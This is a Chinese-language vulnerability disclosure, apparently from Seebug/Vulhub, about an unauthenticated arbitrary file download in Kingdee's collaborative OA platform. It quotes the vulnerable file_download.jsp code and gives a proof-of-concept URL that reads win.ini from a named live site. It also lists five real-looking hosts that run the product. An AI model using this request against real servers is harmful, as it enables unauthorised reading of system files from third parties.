VULHUB ™

### 简要描述： 金蝶协同办公平台任意文件下载漏洞（无需登录） ### 详细说明： 经测试发现，该系统存在任意文件下载，且无需登录 存在漏洞的文件： ``` /oa/admin/application/file_download.jsp?filePath= ``` 部分漏洞代码为： ``` <%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><% String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath"); String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType"); String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName"); java.io.OutputStream ou = null; java.io.InputStream is = null; try{ java.io.File logFile = new java.io.File(logPath); if (logFile.exists()) { is = new java.io.FileInputStream(logPath); byte[] content = new byte[1024]; int i = 0; response.setContentType(contentType); ou = response.getOutputStream(); response.setHeader("Content-Disposition", "attachment;...

### 简要描述： 金蝶协同办公平台任意文件下载漏洞（无需登录） ### 详细说明： 经测试发现，该系统存在任意文件下载，且无需登录 存在漏洞的文件： ``` /oa/admin/application/file_download.jsp?filePath= ``` 部分漏洞代码为： ``` <%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><% String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath"); String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType"); String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName"); java.io.OutputStream ou = null; java.io.InputStream is = null; try{ java.io.File logFile = new java.io.File(logPath); if (logFile.exists()) { is = new java.io.FileInputStream(logPath); byte[] content = new byte[1024]; int i = 0; response.setContentType(contentType); ou = response.getOutputStream(); response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\""); while ((i = is.read(content)) != -1) { ou.write(content, 0, i); } ou.flush(); } else { out.println("file not found:"+logPath); } } catch (Exception e) { System.out.println(e); } finally { if (ou != null) ou.close(); if (is != null) is.close(); } %> ``` 很明显的任意文件下载漏洞，随便在网上找一个实例进行证明 ``` http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini ``` 直接访问即可下载该文件了，保存的文件名为：file.txt [<img src="https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png) 5个案例： ``` http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit http://www.jrxoa.com/oa/themes/mskin/login/login.jsp ``` ### 漏洞证明： 下载的文件 [<img src="https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png)